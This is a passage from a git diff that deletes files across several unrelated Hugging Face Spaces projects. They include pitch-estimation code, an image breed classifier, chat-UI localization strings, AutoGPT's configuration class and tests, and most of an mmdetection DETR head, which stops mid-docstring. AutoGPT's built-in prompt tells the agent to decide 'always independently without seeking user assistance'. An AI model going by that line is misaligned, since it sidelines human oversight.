- # torch.cuda.synchronize() - # t1=ttime() - hidden = self.mel2hidden(mel) - # torch.cuda.synchronize() - # t2=ttime() - hidden = hidden.squeeze(0).cpu().numpy() - if self.is_half == True: - hidden = hidden.astype("float32") - f0 = self.decode(hidden, thred=thred) - # torch.cuda.synchronize() - # t3=ttime() - # print("hmvpe:%s\t%s\t%s\t%s"%(t1-t0,t2-t1,t3-t2,t3-t0)) - return f0 - - def to_local_average_cents(self, salience, thred=0.05): - # t0 = ttime() - center = np.argmax(salience, axis=1) # 帧长#index - salience = np.pad(salience, ((0, 0), (4, 4))) # 帧长,368 - # t1 = ttime() - center += 4 - todo_salience = [] - todo_cents_mapping = [] - starts = center - 4 - ends = center + 5 - for idx in range(salience.shape[0]): - todo_salience.append(salience[:, starts[idx] : ends[idx]][idx]) - todo_cents_mapping.append(self.cents_mapping[starts[idx] : ends[idx]]) - # t2 = ttime() - todo_salience = np.array(todo_salience) # 帧长,9 - todo_cents_mapping = np.array(todo_cents_mapping) # 帧长,9 - product_sum = np.sum(todo_salience * todo_cents_mapping, 1) - weight_sum = np.sum(todo_salience, 1) # 帧长 - devided = product_sum / weight_sum # 帧长 - # t3 = ttime() - maxx = np.max(salience, axis=1) # 帧长 - devided[maxx <= thred] = 0 - # t4 = ttime() - # print("decode:%s\t%s\t%s\t%s" % (t1 - t0, t2 - t1, t3 - t2, t4 - t3)) - return devided - - -# if __name__ == '__main__': -# audio, sampling_rate = sf.read("卢本伟语录~1.wav") -# if len(audio.shape) > 1: -# audio = librosa.to_mono(audio.transpose(1, 0)) -# audio_bak = audio.copy() -# if sampling_rate != 16000: -# audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) -# model_path = "/bili-coeus/jupyter/jupyterhub-liujing04/vits_ch/test-RMVPE/weights/rmvpe_llc_half.pt" -# thred = 0.03 # 0.01 -# device = 'cuda' if torch.cuda.is_available() else 'cpu' -# rmvpe = RMVPE(model_path,is_half=False, device=device) -# t0=ttime() -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = 
rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# f0 = rmvpe.infer_from_audio(audio, thred=thred) -# t1=ttime() -# print(f0.shape,t1-t0) diff --git a/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py b/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py deleted file mode 100644 index 8f6cfdf1c9ad7089ae7fd7b19c195f353647cb2d..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/utils/utils.py +++ /dev/null @@ -1,12 +0,0 @@ -from typing import Any, Dict, Optional - - -def safe_get(d: Dict, key: str, default: Any = None) -> Optional[Any]: - """Safely a value from dictionairy using a specific key""" - return d.get(key, default) or default - - -def format_uri(uri: Optional[str]) -> Optional[str]: - if uri is not None and not uri.endswith("/"): - uri += "/" - return uri diff --git a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py b/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py deleted file mode 100644 index cbbfc8c7a5b52adbcfa23a1ce7cee8c9cc16f427..0000000000000000000000000000000000000000 --- a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Hamster/con_hamster_logreg.py +++ /dev/null @@ -1,37 +0,0 @@ -import cv2 -import numpy as np -from PIL import Image -import pickle -import tensorflow as tf -import os - -class hamsterLogReg: - def __init__(self,url) -> None: - self.image = url - - def predict_image(self): - # Load the model - load_extractor = tf.keras.models.load_model("././Model/Hamster/resnetLogreg/resnet_EXTRACTOR.h5") - - modelpath = "././Model/Hamster/resnetLogreg/dataSaved.pkl" - - with open(modelpath, 'rb') as file: - saved_data = pickle.load(file) - animal_breed = saved_data['class_name'] - model = saved_data['logreg_model'] - - im = Image.open(self.image) - img = im.convert("RGB") - img= np.asarray(img) - image_resized= cv2.resize(img, (224,224)) - features = 
load_extractor.predict(np.expand_dims(image_resized, axis=0)) - - reshaped_features = features.reshape(features.shape[0],-1) - predicted_class = model.predict(reshaped_features) - pred_prob = model.predict_proba(reshaped_features)[:2] - prediction_probability = pred_prob[0][predicted_class[0]] - predicted_class - - output_class= animal_breed[predicted_class[0]] - - return [output_class, prediction_probability] diff --git a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js b/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js deleted file mode 100644 index 2e9997ac154d0fee66c0e8e28a780a3bc54ef8b1..0000000000000000000000000000000000000000 --- a/spaces/JohnSmith9982/ChuanhuChatGPT/web_assets/javascript/localization.js +++ /dev/null @@ -1,67 +0,0 @@ - -// i18n - -const language = navigator.language.slice(0,2); - -const forView_i18n = { - 'zh': "仅供查看", - 'en': "For viewing only", - 'ja': "閲覧専用", - 'ko': "읽기 전용", - 'fr': "Pour consultation seulement", - 'es': "Solo para visualización", - 'sv': "Endast för visning", -}; - -const deleteConfirm_i18n_pref = { - 'zh': "你真的要删除 ", - 'en': "Are you sure you want to delete ", - 'ja': "本当に ", - 'ko': "정말로 ", - 'sv': "Är du säker på att du vill ta bort " -}; - -const deleteConfirm_i18n_suff = { - 'zh': " 吗?", - 'en': " ?", - 'ja': " を削除してもよろしいですか?", - 'ko': " 을(를) 삭제하시겠습니까?", - 'sv': " ?" -}; - -const usingLatest_i18n = { - 'zh': "您使用的就是最新版!", - 'en': "You are using the latest version!", - 'ja': "最新バージョンを使用しています!", - 'ko': "최신 버전을 사용하고 있습니다!", - 'sv': "Du använder den senaste versionen!" -}; - -const updatingMsg_i18n = { - 'zh': "正在尝试更新...", - 'en': "Trying to update...", - 'ja': "更新を試みています...", - 'ko': "업데이트를 시도 중...", - 'sv': "Försöker uppdatera..." 
-} - -const updateSuccess_i18n = { - 'zh': "更新成功,请重启本程序。", - 'en': "Updated successfully, please restart this program.", - 'ja': "更新が成功しました、このプログラムを再起動してください。", - 'ko': "업데이트 성공, 이 프로그램을 재시작 해주세요.", - 'sv': "Uppdaterat framgångsrikt, starta om programmet." -} - -const updateFailure_i18n = { - 'zh': '更新失败,请尝试手动更新。', - 'en': 'Update failed, please try manually updating.', - 'ja': '更新に失敗しました、手動での更新をお試しください。', - 'ko': '업데이트 실패, 수동 업데이트를 시도하십시오.', - 'sv': 'Uppdateringen misslyckades, prova att uppdatera manuellt.' -} - - -function i18n(msg) { - return msg.hasOwnProperty(language) ? msg[language] : msg['en']; -} diff --git a/spaces/KenjieDec/RemBG/rembg/cli.py b/spaces/KenjieDec/RemBG/rembg/cli.py deleted file mode 100644 index bd3ac2683424596eabe8a4ef5bb98658cc1d12ea..0000000000000000000000000000000000000000 --- a/spaces/KenjieDec/RemBG/rembg/cli.py +++ /dev/null @@ -1,14 +0,0 @@ -import click - -from . import _version -from .commands import command_functions - - -@click.group() -@click.version_option(version=_version.get_versions()["version"]) -def main() -> None: - pass - - -for command in command_functions: - main.add_command(command) diff --git a/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py b/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py deleted file mode 100644 index d50c30beee9dc8009f63415378ae1c6a399f0037..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/AutoGPT/autogpt/config/ai_config.py +++ /dev/null @@ -1,121 +0,0 @@ -# sourcery skip: do-not-use-staticmethod -""" -A module that contains the AIConfig class object that contains the configuration -""" -from __future__ import annotations - -import os -from typing import Type - -import yaml - - -class AIConfig: - """ - A class object that contains the configuration information for the AI - - Attributes: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. 
- """ - - def __init__( - self, ai_name: str = "", ai_role: str = "", ai_goals: list | None = None - ) -> None: - """ - Initialize a class instance - - Parameters: - ai_name (str): The name of the AI. - ai_role (str): The description of the AI's role. - ai_goals (list): The list of objectives the AI is supposed to complete. - Returns: - None - """ - if ai_goals is None: - ai_goals = [] - self.ai_name = ai_name - self.ai_role = ai_role - self.ai_goals = ai_goals - - # Soon this will go in a folder where it remembers more stuff about the run(s) - SAVE_FILE = os.path.join(os.path.dirname(__file__), "..", "ai_settings.yaml") - - @staticmethod - def load(config_file: str = SAVE_FILE) -> "AIConfig": - """ - Returns class object with parameters (ai_name, ai_role, ai_goals) loaded from - yaml file if yaml file exists, - else returns class with no parameters. - - Parameters: - config_file (int): The path to the config yaml file. - DEFAULT: "../ai_settings.yaml" - - Returns: - cls (object): An instance of given cls object - """ - - try: - with open(config_file, encoding="utf-8") as file: - config_params = yaml.load(file, Loader=yaml.FullLoader) - except FileNotFoundError: - config_params = {} - - ai_name = config_params.get("ai_name", "") - ai_role = config_params.get("ai_role", "") - ai_goals = config_params.get("ai_goals", []) - # type: Type[AIConfig] - return AIConfig(ai_name, ai_role, ai_goals) - - def save(self, config_file: str = SAVE_FILE) -> None: - """ - Saves the class parameters to the specified file yaml file path as a yaml file. - - Parameters: - config_file(str): The path to the config yaml file. 
- DEFAULT: "../ai_settings.yaml" - - Returns: - None - """ - - config = { - "ai_name": self.ai_name, - "ai_role": self.ai_role, - "ai_goals": self.ai_goals, - } - with open(config_file, "w", encoding="utf-8") as file: - yaml.dump(config, file, allow_unicode=True) - - def construct_full_prompt(self) -> str: - """ - Returns a prompt to the user with the class information in an organized fashion. - - Parameters: - None - - Returns: - full_prompt (str): A string containing the initial prompt for the user - including the ai_name, ai_role and ai_goals. - """ - - prompt_start = ( - "Your decisions must always be made independently without" - " seeking user assistance. Play to your strengths as an LLM and pursue" - " simple strategies with no legal complications." - "" - ) - - from autogpt.prompt import get_prompt - - # Construct full prompt - full_prompt = ( - f"You are {self.ai_name}, {self.ai_role}\n{prompt_start}\n\nGOALS:\n\n" - ) - for i, goal in enumerate(self.ai_goals): - full_prompt += f"{i+1}. {goal}\n" - - full_prompt += f"\n\n{get_prompt()}" - return full_prompt diff --git a/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py b/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py deleted file mode 100644 index 6a0bfd6c7bbdbfaa3750e9dee621bd25e17a448b..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/AutoGPT/tests/test_prompt_generator.py +++ /dev/null @@ -1,114 +0,0 @@ -from unittest import TestCase - -from autogpt.promptgenerator import PromptGenerator - - -class TestPromptGenerator(TestCase): - """ - Test cases for the PromptGenerator class, which is responsible for generating - prompts for the AI with constraints, commands, resources, and performance evaluations. - """ - - @classmethod - def setUpClass(cls): - """ - Set up the initial state for each test method by creating an instance of PromptGenerator. 
- """ - cls.generator = PromptGenerator() - - # Test whether the add_constraint() method adds a constraint to the generator's constraints list - def test_add_constraint(self): - """ - Test if the add_constraint() method adds a constraint to the generator's constraints list. - """ - constraint = "Constraint1" - self.generator.add_constraint(constraint) - self.assertIn(constraint, self.generator.constraints) - - # Test whether the add_command() method adds a command to the generator's commands list - def test_add_command(self): - """ - Test if the add_command() method adds a command to the generator's commands list. - """ - command_label = "Command Label" - command_name = "command_name" - args = {"arg1": "value1", "arg2": "value2"} - self.generator.add_command(command_label, command_name, args) - command = { - "label": command_label, - "name": command_name, - "args": args, - } - self.assertIn(command, self.generator.commands) - - def test_add_resource(self): - """ - Test if the add_resource() method adds a resource to the generator's resources list. - """ - resource = "Resource1" - self.generator.add_resource(resource) - self.assertIn(resource, self.generator.resources) - - def test_add_performance_evaluation(self): - """ - Test if the add_performance_evaluation() method adds an evaluation to the generator's - performance_evaluation list. - """ - evaluation = "Evaluation1" - self.generator.add_performance_evaluation(evaluation) - self.assertIn(evaluation, self.generator.performance_evaluation) - - def test_generate_prompt_string(self): - """ - Test if the generate_prompt_string() method generates a prompt string with all the added - constraints, commands, resources, and evaluations. 
- """ - # Define the test data - constraints = ["Constraint1", "Constraint2"] - commands = [ - { - "label": "Command1", - "name": "command_name1", - "args": {"arg1": "value1"}, - }, - { - "label": "Command2", - "name": "command_name2", - "args": {}, - }, - ] - resources = ["Resource1", "Resource2"] - evaluations = ["Evaluation1", "Evaluation2"] - - # Add test data to the generator - for constraint in constraints: - self.generator.add_constraint(constraint) - for command in commands: - self.generator.add_command( - command["label"], command["name"], command["args"] - ) - for resource in resources: - self.generator.add_resource(resource) - for evaluation in evaluations: - self.generator.add_performance_evaluation(evaluation) - - # Generate the prompt string and verify its correctness - prompt_string = self.generator.generate_prompt_string() - self.assertIsNotNone(prompt_string) - - # Check if all constraints, commands, resources, and evaluations are present in the prompt string - for constraint in constraints: - self.assertIn(constraint, prompt_string) - for command in commands: - self.assertIn(command["name"], prompt_string) - for key, value in command["args"].items(): - self.assertIn(f'"{key}": "{value}"', prompt_string) - for resource in resources: - self.assertIn(resource, prompt_string) - for evaluation in evaluations: - self.assertIn(evaluation, prompt_string) - - self.assertIn("constraints", prompt_string.lower()) - self.assertIn("commands", prompt_string.lower()) - self.assertIn("resources", prompt_string.lower()) - self.assertIn("performance evaluation", prompt_string.lower()) diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py b/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py deleted file mode 100644 index 42a94d1ae9c2a05fbc9d6c59f9ef181f73a5929b..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/dense_heads/detr_head.py +++ /dev/null @@ -1,614 +0,0 @@ -# Copyright (c) 
OpenMMLab. All rights reserved. -from typing import Dict, List, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from mmcv.cnn import Linear -from mmcv.cnn.bricks.transformer import FFN -from mmengine.model import BaseModule -from mmengine.structures import InstanceData -from torch import Tensor - -from mmdet.registry import MODELS, TASK_UTILS -from mmdet.structures import SampleList -from mmdet.structures.bbox import bbox_cxcywh_to_xyxy, bbox_xyxy_to_cxcywh -from mmdet.utils import (ConfigType, InstanceList, OptInstanceList, - OptMultiConfig, reduce_mean) -from ..utils import multi_apply - - -@MODELS.register_module() -class DETRHead(BaseModule): - r"""Head of DETR. DETR:End-to-End Object Detection with Transformers. - - More details can be found in the `paper - `_ . - - Args: - num_classes (int): Number of categories excluding the background. - embed_dims (int): The dims of Transformer embedding. - num_reg_fcs (int): Number of fully-connected layers used in `FFN`, - which is then used for the regression head. Defaults to 2. - sync_cls_avg_factor (bool): Whether to sync the `avg_factor` of - all ranks. Default to `False`. - loss_cls (:obj:`ConfigDict` or dict): Config of the classification - loss. Defaults to `CrossEntropyLoss`. - loss_bbox (:obj:`ConfigDict` or dict): Config of the regression bbox - loss. Defaults to `L1Loss`. - loss_iou (:obj:`ConfigDict` or dict): Config of the regression iou - loss. Defaults to `GIoULoss`. - train_cfg (:obj:`ConfigDict` or dict): Training config of transformer - head. - test_cfg (:obj:`ConfigDict` or dict): Testing config of transformer - head. - init_cfg (:obj:`ConfigDict` or dict, optional): the config to control - the initialization. Defaults to None. 
- """ - - _version = 2 - - def __init__( - self, - num_classes: int, - embed_dims: int = 256, - num_reg_fcs: int = 2, - sync_cls_avg_factor: bool = False, - loss_cls: ConfigType = dict( - type='CrossEntropyLoss', - bg_cls_weight=0.1, - use_sigmoid=False, - loss_weight=1.0, - class_weight=1.0), - loss_bbox: ConfigType = dict(type='L1Loss', loss_weight=5.0), - loss_iou: ConfigType = dict(type='GIoULoss', loss_weight=2.0), - train_cfg: ConfigType = dict( - assigner=dict( - type='HungarianAssigner', - match_costs=[ - dict(type='ClassificationCost', weight=1.), - dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'), - dict(type='IoUCost', iou_mode='giou', weight=2.0) - ])), - test_cfg: ConfigType = dict(max_per_img=100), - init_cfg: OptMultiConfig = None) -> None: - super().__init__(init_cfg=init_cfg) - self.bg_cls_weight = 0 - self.sync_cls_avg_factor = sync_cls_avg_factor - class_weight = loss_cls.get('class_weight', None) - if class_weight is not None and (self.__class__ is DETRHead): - assert isinstance(class_weight, float), 'Expected ' \ - 'class_weight to have type float. Found ' \ - f'{type(class_weight)}.' - # NOTE following the official DETR repo, bg_cls_weight means - # relative classification weight of the no-object class. - bg_cls_weight = loss_cls.get('bg_cls_weight', class_weight) - assert isinstance(bg_cls_weight, float), 'Expected ' \ - 'bg_cls_weight to have type float. Found ' \ - f'{type(bg_cls_weight)}.' - class_weight = torch.ones(num_classes + 1) * class_weight - # set background class as the last indice - class_weight[num_classes] = bg_cls_weight - loss_cls.update({'class_weight': class_weight}) - if 'bg_cls_weight' in loss_cls: - loss_cls.pop('bg_cls_weight') - self.bg_cls_weight = bg_cls_weight - - if train_cfg: - assert 'assigner' in train_cfg, 'assigner should be provided ' \ - 'when train_cfg is set.' 
- assigner = train_cfg['assigner'] - self.assigner = TASK_UTILS.build(assigner) - if train_cfg.get('sampler', None) is not None: - raise RuntimeError('DETR do not build sampler.') - self.num_classes = num_classes - self.embed_dims = embed_dims - self.num_reg_fcs = num_reg_fcs - self.train_cfg = train_cfg - self.test_cfg = test_cfg - self.loss_cls = MODELS.build(loss_cls) - self.loss_bbox = MODELS.build(loss_bbox) - self.loss_iou = MODELS.build(loss_iou) - - if self.loss_cls.use_sigmoid: - self.cls_out_channels = num_classes - else: - self.cls_out_channels = num_classes + 1 - - self._init_layers() - - def _init_layers(self) -> None: - """Initialize layers of the transformer head.""" - # cls branch - self.fc_cls = Linear(self.embed_dims, self.cls_out_channels) - # reg branch - self.activate = nn.ReLU() - self.reg_ffn = FFN( - self.embed_dims, - self.embed_dims, - self.num_reg_fcs, - dict(type='ReLU', inplace=True), - dropout=0.0, - add_residual=False) - # NOTE the activations of reg_branch here is the same as - # those in transformer, but they are actually different - # in DAB-DETR (prelu in transformer and relu in reg_branch) - self.fc_reg = Linear(self.embed_dims, 4) - - def forward(self, hidden_states: Tensor) -> Tuple[Tensor]: - """"Forward function. - - Args: - hidden_states (Tensor): Features from transformer decoder. If - `return_intermediate_dec` in detr.py is True output has shape - (num_decoder_layers, bs, num_queries, dim), else has shape - (1, bs, num_queries, dim) which only contains the last layer - outputs. - Returns: - tuple[Tensor]: results of head containing the following tensor. - - - layers_cls_scores (Tensor): Outputs from the classification head, - shape (num_decoder_layers, bs, num_queries, cls_out_channels). - Note cls_out_channels should include background. - - layers_bbox_preds (Tensor): Sigmoid outputs from the regression - head with normalized coordinate format (cx, cy, w, h), has shape - (num_decoder_layers, bs, num_queries, 4). 
- """ - layers_cls_scores = self.fc_cls(hidden_states) - layers_bbox_preds = self.fc_reg( - self.activate(self.reg_ffn(hidden_states))).sigmoid() - return layers_cls_scores, layers_bbox_preds - - def loss(self, hidden_states: Tensor, - batch_data_samples: SampleList) -> dict: - """Perform forward propagation and loss calculation of the detection - head on the features of the upstream network. - - Args: - hidden_states (Tensor): Feature from the transformer decoder, has - shape (num_decoder_layers, bs, num_queries, cls_out_channels) - or (num_decoder_layers, num_queries, bs, cls_out_channels). - batch_data_samples (List[:obj:`DetDataSample`]): The Data - Samples. It usually includes information such as - `gt_instance`, `gt_panoptic_seg` and `gt_sem_seg`. - - Returns: - dict: A dictionary of loss components. - """ - batch_gt_instances = [] - batch_img_metas = [] - for data_sample in batch_data_samples: - batch_img_metas.append(data_sample.metainfo) - batch_gt_instances.append(data_sample.gt_instances) - - outs = self(hidden_states) - loss_inputs = outs + (batch_gt_instances, batch_img_metas) - losses = self.loss_by_feat(*loss_inputs) - return losses - - def loss_by_feat( - self, - all_layers_cls_scores: Tensor, - all_layers_bbox_preds: Tensor, - batch_gt_instances: InstanceList, - batch_img_metas: List[dict], - batch_gt_instances_ignore: OptInstanceList = None - ) -> Dict[str, Tensor]: - """"Loss function. - - Only outputs from the last feature level are used for computing - losses by default. - - Args: - all_layers_cls_scores (Tensor): Classification outputs - of each decoder layers. Each is a 4D-tensor, has shape - (num_decoder_layers, bs, num_queries, cls_out_channels). - all_layers_bbox_preds (Tensor): Sigmoid regression - outputs of each decoder layers. Each is a 4D-tensor with - normalized coordinate format (cx, cy, w, h) and shape - (num_decoder_layers, bs, num_queries, 4). - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. 
It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - batch_gt_instances_ignore (list[:obj:`InstanceData`], optional): - Batch of gt_instances_ignore. It includes ``bboxes`` attribute - data that is ignored during training and testing. - Defaults to None. - - Returns: - dict[str, Tensor]: A dictionary of loss components. - """ - assert batch_gt_instances_ignore is None, \ - f'{self.__class__.__name__} only supports ' \ - 'for batch_gt_instances_ignore setting to None.' - - losses_cls, losses_bbox, losses_iou = multi_apply( - self.loss_by_feat_single, - all_layers_cls_scores, - all_layers_bbox_preds, - batch_gt_instances=batch_gt_instances, - batch_img_metas=batch_img_metas) - - loss_dict = dict() - # loss from the last decoder layer - loss_dict['loss_cls'] = losses_cls[-1] - loss_dict['loss_bbox'] = losses_bbox[-1] - loss_dict['loss_iou'] = losses_iou[-1] - # loss from other decoder layers - num_dec_layer = 0 - for loss_cls_i, loss_bbox_i, loss_iou_i in \ - zip(losses_cls[:-1], losses_bbox[:-1], losses_iou[:-1]): - loss_dict[f'd{num_dec_layer}.loss_cls'] = loss_cls_i - loss_dict[f'd{num_dec_layer}.loss_bbox'] = loss_bbox_i - loss_dict[f'd{num_dec_layer}.loss_iou'] = loss_iou_i - num_dec_layer += 1 - return loss_dict - - def loss_by_feat_single(self, cls_scores: Tensor, bbox_preds: Tensor, - batch_gt_instances: InstanceList, - batch_img_metas: List[dict]) -> Tuple[Tensor]: - """Loss function for outputs from a single decoder layer of a single - feature level. - - Args: - cls_scores (Tensor): Box score logits from a single decoder layer - for all images, has shape (bs, num_queries, cls_out_channels). - bbox_preds (Tensor): Sigmoid outputs from a single decoder layer - for all images, with normalized coordinate (cx, cy, w, h) and - shape (bs, num_queries, 4). - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. 
It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - - Returns: - Tuple[Tensor]: A tuple including `loss_cls`, `loss_box` and - `loss_iou`. - """ - num_imgs = cls_scores.size(0) - cls_scores_list = [cls_scores[i] for i in range(num_imgs)] - bbox_preds_list = [bbox_preds[i] for i in range(num_imgs)] - cls_reg_targets = self.get_targets(cls_scores_list, bbox_preds_list, - batch_gt_instances, batch_img_metas) - (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, - num_total_pos, num_total_neg) = cls_reg_targets - labels = torch.cat(labels_list, 0) - label_weights = torch.cat(label_weights_list, 0) - bbox_targets = torch.cat(bbox_targets_list, 0) - bbox_weights = torch.cat(bbox_weights_list, 0) - - # classification loss - cls_scores = cls_scores.reshape(-1, self.cls_out_channels) - # construct weighted avg_factor to match with the official DETR repo - cls_avg_factor = num_total_pos * 1.0 + \ - num_total_neg * self.bg_cls_weight - if self.sync_cls_avg_factor: - cls_avg_factor = reduce_mean( - cls_scores.new_tensor([cls_avg_factor])) - cls_avg_factor = max(cls_avg_factor, 1) - - loss_cls = self.loss_cls( - cls_scores, labels, label_weights, avg_factor=cls_avg_factor) - - # Compute the average number of gt boxes across all gpus, for - # normalization purposes - num_total_pos = loss_cls.new_tensor([num_total_pos]) - num_total_pos = torch.clamp(reduce_mean(num_total_pos), min=1).item() - - # construct factors used for rescale bboxes - factors = [] - for img_meta, bbox_pred in zip(batch_img_metas, bbox_preds): - img_h, img_w, = img_meta['img_shape'] - factor = bbox_pred.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0).repeat( - bbox_pred.size(0), 1) - factors.append(factor) - factors = torch.cat(factors, 0) - - # DETR regress the relative position of boxes (cxcywh) in the image, - # thus the learning target is normalized by the image 
size. So here - # we need to re-scale them for calculating IoU loss - bbox_preds = bbox_preds.reshape(-1, 4) - bboxes = bbox_cxcywh_to_xyxy(bbox_preds) * factors - bboxes_gt = bbox_cxcywh_to_xyxy(bbox_targets) * factors - - # regression IoU loss, defaultly GIoU loss - loss_iou = self.loss_iou( - bboxes, bboxes_gt, bbox_weights, avg_factor=num_total_pos) - - # regression L1 loss - loss_bbox = self.loss_bbox( - bbox_preds, bbox_targets, bbox_weights, avg_factor=num_total_pos) - return loss_cls, loss_bbox, loss_iou - - def get_targets(self, cls_scores_list: List[Tensor], - bbox_preds_list: List[Tensor], - batch_gt_instances: InstanceList, - batch_img_metas: List[dict]) -> tuple: - """Compute regression and classification targets for a batch image. - - Outputs from a single decoder layer of a single feature level are used. - - Args: - cls_scores_list (list[Tensor]): Box score logits from a single - decoder layer for each image, has shape [num_queries, - cls_out_channels]. - bbox_preds_list (list[Tensor]): Sigmoid outputs from a single - decoder layer for each image, with normalized coordinate - (cx, cy, w, h) and shape [num_queries, 4]. - batch_gt_instances (list[:obj:`InstanceData`]): Batch of - gt_instance. It usually includes ``bboxes`` and ``labels`` - attributes. - batch_img_metas (list[dict]): Meta information of each image, e.g., - image size, scaling factor, etc. - - Returns: - tuple: a tuple containing the following targets. - - - labels_list (list[Tensor]): Labels for all images. - - label_weights_list (list[Tensor]): Label weights for all images. - - bbox_targets_list (list[Tensor]): BBox targets for all images. - - bbox_weights_list (list[Tensor]): BBox weights for all images. - - num_total_pos (int): Number of positive samples in all images. - - num_total_neg (int): Number of negative samples in all images. 
- """ - (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, - pos_inds_list, - neg_inds_list) = multi_apply(self._get_targets_single, - cls_scores_list, bbox_preds_list, - batch_gt_instances, batch_img_metas) - num_total_pos = sum((inds.numel() for inds in pos_inds_list)) - num_total_neg = sum((inds.numel() for inds in neg_inds_list)) - return (labels_list, label_weights_list, bbox_targets_list, - bbox_weights_list, num_total_pos, num_total_neg) - - def _get_targets_single(self, cls_score: Tensor, bbox_pred: Tensor, - gt_instances: InstanceData, - img_meta: dict) -> tuple: - """Compute regression and classification targets for one image. - - Outputs from a single decoder layer of a single feature level are used. - - Args: - cls_score (Tensor): Box score logits from a single decoder layer - for one image. Shape [num_queries, cls_out_channels]. - bbox_pred (Tensor): Sigmoid outputs from a single decoder layer - for one image, with normalized coordinate (cx, cy, w, h) and - shape [num_queries, 4]. - gt_instances (:obj:`InstanceData`): Ground truth of instance - annotations. It should includes ``bboxes`` and ``labels`` - attributes. - img_meta (dict): Meta information for one image. - - Returns: - tuple[Tensor]: a tuple containing the following for one image. - - - labels (Tensor): Labels of each image. - - label_weights (Tensor]): Label weights of each image. - - bbox_targets (Tensor): BBox targets of each image. - - bbox_weights (Tensor): BBox weights of each image. - - pos_inds (Tensor): Sampled positive indices for each image. - - neg_inds (Tensor): Sampled negative indices for each image. 
- """ - img_h, img_w = img_meta['img_shape'] - factor = bbox_pred.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0) - num_bboxes = bbox_pred.size(0) - # convert bbox_pred from xywh, normalized to xyxy, unnormalized - bbox_pred = bbox_cxcywh_to_xyxy(bbox_pred) - bbox_pred = bbox_pred * factor - - pred_instances = InstanceData(scores=cls_score, bboxes=bbox_pred) - # assigner and sampler - assign_result = self.assigner.assign( - pred_instances=pred_instances, - gt_instances=gt_instances, - img_meta=img_meta) - - gt_bboxes = gt_instances.bboxes - gt_labels = gt_instances.labels - pos_inds = torch.nonzero( - assign_result.gt_inds > 0, as_tuple=False).squeeze(-1).unique() - neg_inds = torch.nonzero( - assign_result.gt_inds == 0, as_tuple=False).squeeze(-1).unique() - pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1 - pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds.long(), :] - - # label targets - labels = gt_bboxes.new_full((num_bboxes, ), - self.num_classes, - dtype=torch.long) - labels[pos_inds] = gt_labels[pos_assigned_gt_inds] - label_weights = gt_bboxes.new_ones(num_bboxes) - - # bbox targets - bbox_targets = torch.zeros_like(bbox_pred) - bbox_weights = torch.zeros_like(bbox_pred) - bbox_weights[pos_inds] = 1.0 - - # DETR regress the relative position of boxes (cxcywh) in the image. - # Thus the learning target should be normalized by the image size, also - # the box format should be converted from defaultly x1y1x2y2 to cxcywh. - pos_gt_bboxes_normalized = pos_gt_bboxes / factor - pos_gt_bboxes_targets = bbox_xyxy_to_cxcywh(pos_gt_bboxes_normalized) - bbox_targets[pos_inds] = pos_gt_bboxes_targets - return (labels, label_weights, bbox_targets, bbox_weights, pos_inds, - neg_inds) - - def loss_and_predict( - self, hidden_states: Tuple[Tensor], - batch_data_samples: SampleList) -> Tuple[dict, InstanceList]: - """Perform forward propagation of the head, then calculate loss and - predictions from the features and data samples. 
Over-write because - img_metas are needed as inputs for bbox_head. - - Args: - hidden_states (tuple[Tensor]): Feature from the transformer - decoder, has shape (num_decoder_layers, bs, num_queries, dim). - batch_data_samples (list[:obj:`DetDataSample`]): Each item contains - the meta information of each image and corresponding - annotations. - - Returns: - tuple: the return value is a tuple contains: - - - losses: (dict[str, Tensor]): A dictionary of loss components. - - predictions (list[:obj:`InstanceData`]): Detection - results of each image after the post process. - """ - batch_gt_instances = [] - batch_img_metas = [] - for data_sample in batch_data_samples: - batch_img_metas.append(data_sample.metainfo) - batch_gt_instances.append(data_sample.gt_instances) - - outs = self(hidden_states) - loss_inputs = outs + (batch_gt_instances, batch_img_metas) - losses = self.loss_by_feat(*loss_inputs) - - predictions = self.predict_by_feat( - *outs, batch_img_metas=batch_img_metas) - return losses, predictions - - def predict(self, - hidden_states: Tuple[Tensor], - batch_data_samples: SampleList, - rescale: bool = True) -> InstanceList: - """Perform forward propagation of the detection head and predict - detection results on the features of the upstream network. Over-write - because img_metas are needed as inputs for bbox_head. - - Args: - hidden_states (tuple[Tensor]): Multi-level features from the - upstream network, each is a 4D-tensor. - batch_data_samples 